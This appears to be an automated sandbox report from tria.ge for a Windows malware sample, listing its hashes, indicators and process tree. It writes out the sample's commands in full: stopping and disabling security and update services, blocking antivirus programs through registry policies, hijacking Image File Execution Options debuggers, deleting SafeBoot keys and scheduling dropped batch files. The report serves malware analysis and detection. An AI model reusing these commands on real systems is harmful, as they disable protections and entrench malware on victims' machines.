Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
2s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2024, 18:51
Static task
static1
Behavioral task
behavioral1
Sample
f329f26f17695afc1155d04b40267702.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f329f26f17695afc1155d04b40267702.exe
Resource
win10v2004-20231222-en
General
-
Target
f329f26f17695afc1155d04b40267702.exe
-
Size
778KB
-
MD5
f329f26f17695afc1155d04b40267702
-
SHA1
da158ea773f1f65a2d7e4e4cb149f2802dac88ec
-
SHA256
464bcafd4ce6a5cdabaed206dfb1f1e06e9937602f9eb3b3a781f4adfe06bf67
-
SHA512
789d2406c5978c59727e424a69a35d96c61da8b2e67689149da5359dca6939d47717d3434c53915e4d907a7071029737e14c87e0bb0e4a21ef023618f7bbf32f
-
SSDEEP
6144:UZfec9EbXDk6Rk8KU/UOPSe570Szp3CrG1VVE+I2GFrQZb++tdsHP4+QfI6Uw:UZWtI6RktOB0VuxerQZb+md4w1Uw
Malware Config
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" net.exe -
Blocks application from running via registry modification 17 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "avp.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "RfwMain.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "RavMoD.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "RavStub.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "KPFW32.EXE" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "KPFW32X.EXE" net.exe Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "CCenter.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "RavMon.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "Rav.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "Rfwsrv.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "KAVPFW.EXE" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KAV32.EXE" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "KAVStart.EXE" net.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "RavService.exe" net.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "rfwcfg.exe" net.exe -
Sets file execution options in registry 2 TTPs 20 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMoD.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rfwsrv.exe net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMoD.exe net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe net.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.EXE net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rfwsrv.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.EXE\Debugger = "D:\\RECYCLER\\????8.exe" net.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\Option.bat f329f26f17695afc1155d04b40267702.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Help\HelpCat.exe f329f26f17695afc1155d04b40267702.exe File created C:\Windows\Sysinf.bat f329f26f17695afc1155d04b40267702.exe File created C:\Windows\regedt32.sys f329f26f17695afc1155d04b40267702.exe File created C:\Windows\system\KavUpda.exe f329f26f17695afc1155d04b40267702.exe File opened for modification C:\Windows\system\KavUpda.exe f329f26f17695afc1155d04b40267702.exe File created C:\Windows\Help\HelpCat.exe f329f26f17695afc1155d04b40267702.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2132 sc.exe 3956 sc.exe 2792 sc.exe 1244 sc.exe 968 sc.exe 60 sc.exe 4444 sc.exe 1416 sc.exe -
Runs net.exe
-
Runs regedit.exe 1 IoCs
pid Process 3500 regedit.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3768 f329f26f17695afc1155d04b40267702.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 3768 wrote to memory of 4168 3768 f329f26f17695afc1155d04b40267702.exe 16 PID 3768 wrote to memory of 4168 3768 f329f26f17695afc1155d04b40267702.exe 16 PID 3768 wrote to memory of 4168 3768 f329f26f17695afc1155d04b40267702.exe 16 PID 3768 wrote to memory of 2088 3768 f329f26f17695afc1155d04b40267702.exe 22 PID 3768 wrote to memory of 2088 3768 f329f26f17695afc1155d04b40267702.exe 22 PID 3768 wrote to memory of 2088 3768 f329f26f17695afc1155d04b40267702.exe 22 PID 2088 wrote to memory of 2588 2088 net.exe 18 PID 2088 wrote to memory of 2588 2088 net.exe 18 PID 2088 wrote to memory of 2588 2088 net.exe 18 PID 3768 wrote to memory of 744 3768 f329f26f17695afc1155d04b40267702.exe 163 PID 3768 wrote to memory of 744 3768 f329f26f17695afc1155d04b40267702.exe 163 PID 3768 wrote to memory of 744 3768 f329f26f17695afc1155d04b40267702.exe 163 PID 3768 wrote to memory of 4328 3768 f329f26f17695afc1155d04b40267702.exe 162 PID 3768 wrote to memory of 4328 3768 f329f26f17695afc1155d04b40267702.exe 162 PID 3768 wrote to memory of 4328 3768 f329f26f17695afc1155d04b40267702.exe 162 PID 3768 wrote to memory of 868 3768 f329f26f17695afc1155d04b40267702.exe 161 PID 3768 wrote to memory of 868 3768 f329f26f17695afc1155d04b40267702.exe 161 PID 3768 wrote to memory of 868 3768 f329f26f17695afc1155d04b40267702.exe 161 PID 3768 wrote to memory of 1976 3768 f329f26f17695afc1155d04b40267702.exe 159 PID 3768 wrote to memory of 1976 3768 f329f26f17695afc1155d04b40267702.exe 159 PID 3768 wrote to memory of 1976 3768 f329f26f17695afc1155d04b40267702.exe 159 PID 3768 wrote to memory of 2020 3768 f329f26f17695afc1155d04b40267702.exe 205 PID 3768 wrote to memory of 2020 3768 f329f26f17695afc1155d04b40267702.exe 205 PID 3768 wrote to memory of 2020 3768 f329f26f17695afc1155d04b40267702.exe 205 PID 3768 wrote to memory of 1768 3768 f329f26f17695afc1155d04b40267702.exe 96 PID 3768 wrote to memory of 1768 3768 f329f26f17695afc1155d04b40267702.exe 96 PID 3768 wrote to memory of 1768 3768 f329f26f17695afc1155d04b40267702.exe 96 PID 3768 wrote to memory of 4144 3768 f329f26f17695afc1155d04b40267702.exe 95 PID 3768 wrote to memory of 4144 3768 f329f26f17695afc1155d04b40267702.exe 95 PID 3768 wrote to memory of 4144 3768 f329f26f17695afc1155d04b40267702.exe 95 PID 3768 wrote to memory of 3972 3768 f329f26f17695afc1155d04b40267702.exe 91 PID 3768 wrote to memory of 3972 3768 f329f26f17695afc1155d04b40267702.exe 91 PID 3768 wrote to memory of 3972 3768 f329f26f17695afc1155d04b40267702.exe 91 PID 3768 wrote to memory of 968 3768 f329f26f17695afc1155d04b40267702.exe 89 PID 3768 wrote to memory of 968 3768 f329f26f17695afc1155d04b40267702.exe 89 PID 3768 wrote to memory of 968 3768 f329f26f17695afc1155d04b40267702.exe 89 PID 3768 wrote to memory of 1244 3768 f329f26f17695afc1155d04b40267702.exe 86 PID 3768 wrote to memory of 1244 3768 f329f26f17695afc1155d04b40267702.exe 86 PID 3768 wrote to memory of 1244 3768 f329f26f17695afc1155d04b40267702.exe 86 PID 3768 wrote to memory of 2792 3768 f329f26f17695afc1155d04b40267702.exe 82 PID 3768 wrote to memory of 2792 3768 f329f26f17695afc1155d04b40267702.exe 82 PID 3768 wrote to memory of 2792 3768 f329f26f17695afc1155d04b40267702.exe 82 PID 3768 wrote to memory of 3956 3768 f329f26f17695afc1155d04b40267702.exe 57 PID 3768 wrote to memory of 3956 3768 f329f26f17695afc1155d04b40267702.exe 57 PID 3768 wrote to memory of 3956 3768 f329f26f17695afc1155d04b40267702.exe 57 PID 3768 wrote to memory of 3500 3768 f329f26f17695afc1155d04b40267702.exe 149 PID 3768 wrote to memory of 3500 3768 f329f26f17695afc1155d04b40267702.exe 149 PID 3768 wrote to memory of 3500 3768 f329f26f17695afc1155d04b40267702.exe 149 PID 2020 wrote to memory of 1520 2020 mousocoreworker.exe 78 PID 2020 wrote to memory of 1520 2020 mousocoreworker.exe 78 PID 2020 wrote to memory of 1520 2020 mousocoreworker.exe 78 PID 3768 wrote to memory of 4604 3768 f329f26f17695afc1155d04b40267702.exe 273 PID 3768 wrote to memory of 4604 3768 f329f26f17695afc1155d04b40267702.exe 273 PID 3768 wrote to memory of 4604 3768 f329f26f17695afc1155d04b40267702.exe 273 PID 3768 wrote to memory of 3908 3768 f329f26f17695afc1155d04b40267702.exe 60 PID 3768 wrote to memory of 3908 3768 f329f26f17695afc1155d04b40267702.exe 60 PID 3768 wrote to memory of 3908 3768 f329f26f17695afc1155d04b40267702.exe 60 PID 4144 wrote to memory of 3320 4144 net.exe 215 PID 4144 wrote to memory of 3320 4144 net.exe 215 PID 4144 wrote to memory of 3320 4144 net.exe 215 -
Views/modifies file attributes 1 TTPs 16 IoCs
pid Process 3176 attrib.exe 4024 attrib.exe 3172 attrib.exe 1968 attrib.exe 2276 attrib.exe 1896 attrib.exe 4220 attrib.exe 2036 attrib.exe 2992 attrib.exe 3900 attrib.exe 4708 attrib.exe 4724 attrib.exe 4912 attrib.exe 5068 attrib.exe 2332 attrib.exe 3660 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f329f26f17695afc1155d04b40267702.exe"C:\Users\Admin\AppData\Local\Temp\f329f26f17695afc1155d04b40267702.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\Option.bat2⤵PID:4168
-
-
C:\Windows\SysWOW64\net.exenet.exe start schedule /y2⤵
- Suspicious use of WriteProcessMemory
PID:2088
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config srservice start= disabled2⤵
- Launches sc.exe
PID:3956
-
-
C:\Windows\SysWOW64\regedit.exeregedit.exe /s C:\Windows\regedt32.sys2⤵
- Runs regedit.exe
PID:3500 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wscsvc /y3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f2⤵PID:3908
-
-
C:\Windows\system\KavUpda.exeC:\Windows\system\KavUpda.exe2⤵PID:4712
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:3932
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f3⤵PID:1488
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f3⤵PID:1968
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config srservice start= disabled3⤵
- Launches sc.exe
PID:60
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config wscsvc start= disabled3⤵
- Launches sc.exe
PID:4444
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:1416
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config srservice start= disabled3⤵
- Launches sc.exe
PID:2132
-
-
C:\Windows\SysWOW64\net.exenet.exe stop 360timeprot /y3⤵PID:3608
-
-
C:\Windows\SysWOW64\net.exenet.exe stop srservice /y3⤵PID:2320
-
-
C:\Windows\SysWOW64\net.exenet.exe stop wuauserv /y3⤵PID:2964
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d4⤵
- Views/modifies file attributes
PID:4024
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop sharedaccess /y3⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:1056
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:2712
-
-
C:\Windows\SysWOW64\net.exenet.exe stop wscsvc /y3⤵PID:3012
-
-
C:\Windows\SysWOW64\cmd.execmd /c at 6:56:47 PM C:\Windows\Sysinf.bat3⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /c at 6:53:47 PM C:\Windows\Sysinf.bat3⤵PID:1056
-
-
C:\Windows\SysWOW64\At.exeAt.exe 6:54:45 PM C:\Windows\Help\HelpCat.exe3⤵PID:2364
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:556
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:3320
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:2964
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:2116
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:4408
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:4608
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:2612
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:1228
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d4⤵
- Views/modifies file attributes
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:2988
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:440
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:400
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:3696
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:2712
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:1228
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:3248
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:3172
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:368
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:4392
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir F:\Autorun.inf /s /q3⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d3⤵PID:1620
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d4⤵
- Views/modifies file attributes
PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c rmdir C:\Autorun.inf /s /q3⤵PID:4036
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d3⤵PID:1360
-
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f2⤵PID:4604
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config wscsvc start= disabled2⤵
- Launches sc.exe
PID:2792
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config SharedAccess start= disabled2⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\SysWOW64\sc.exeC:\Windows\system32\sc.exe config srservice start= disabled2⤵
- Launches sc.exe
PID:968
-
-
C:\Windows\SysWOW64\net.exenet.exe stop 360timeprot /y2⤵PID:3972
-
-
C:\Windows\SysWOW64\net.exenet.exe stop srservice /y2⤵
- Suspicious use of WriteProcessMemory
PID:4144
-
-
C:\Windows\SysWOW64\net.exenet.exe stop wuauserv /y2⤵PID:1768
-
-
C:\Windows\SysWOW64\net.exenet.exe stop sharedaccess /y2⤵PID:2020
-
-
C:\Windows\SysWOW64\net.exenet.exe stop 360timeprot /y2⤵PID:3584
-
-
C:\Windows\SysWOW64\net.exenet.exe stop srservice /y2⤵PID:1712
-
-
C:\Windows\SysWOW64\net.exenet.exe stop wuauserv /y2⤵PID:592
-
-
C:\Windows\SysWOW64\net.exenet.exe stop sharedaccess /y2⤵PID:1864
-
-
C:\Windows\SysWOW64\net.exenet.exe stop wscsvc /y2⤵
- Modifies visibility of file extensions in Explorer
- Blocks application from running via registry modification
- Sets file execution options in registry
PID:3500
-
-
C:\Windows\SysWOW64\net.exenet.exe stop wscsvc /y2⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.execmd /c at 6:56:44 PM C:\Windows\Sysinf.bat2⤵PID:868
-
-
C:\Windows\SysWOW64\cmd.execmd /c at 6:53:44 PM C:\Windows\Sysinf.bat2⤵PID:4328
-
-
C:\Windows\SysWOW64\At.exeAt.exe 6:54:42 PM C:\Windows\Help\HelpCat.exe2⤵PID:744
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start schedule /y1⤵PID:2588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop srservice /y1⤵PID:3320
-
C:\Windows\SysWOW64\at.exeat 6:53:44 PM C:\Windows\Sysinf.bat1⤵PID:4516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wscsvc /y1⤵PID:1416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start schedule /y1⤵PID:4536
-
C:\Windows\SysWOW64\net.exenet.exe start schedule /y1⤵PID:1900
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\Option.bat1⤵PID:4428
-
C:\Windows\SysWOW64\at.exeat 6:56:44 PM C:\Windows\Sysinf.bat1⤵PID:1468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv /y1⤵PID:1688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop 360timeprot /y1⤵PID:1820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sharedaccess /y1⤵PID:1520
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:3176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop srservice /y1⤵PID:2364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop 360timeprot /y1⤵PID:3012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wscsvc /y2⤵PID:3592
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv /y1⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop srservice /y1⤵PID:4064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv /y1⤵PID:4244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sharedaccess /y1⤵PID:3592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop 360timeprot /y1⤵PID:956
-
C:\Windows\SysWOW64\at.exeat 6:56:47 PM C:\Windows\Sysinf.bat1⤵PID:3964
-
C:\Windows\SysWOW64\at.exeat 6:53:47 PM C:\Windows\Sysinf.bat1⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sharedaccess /y1⤵PID:1780
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:4220
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2020
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:5068
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:2036
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:3172 -
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d2⤵
- Views/modifies file attributes
PID:4724
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:2992
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:2332
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:1968
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:3660
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r F:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:3900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4604
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:2276
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Autorun.inf\*.* /s /d1⤵
- Views/modifies file attributes
PID:1896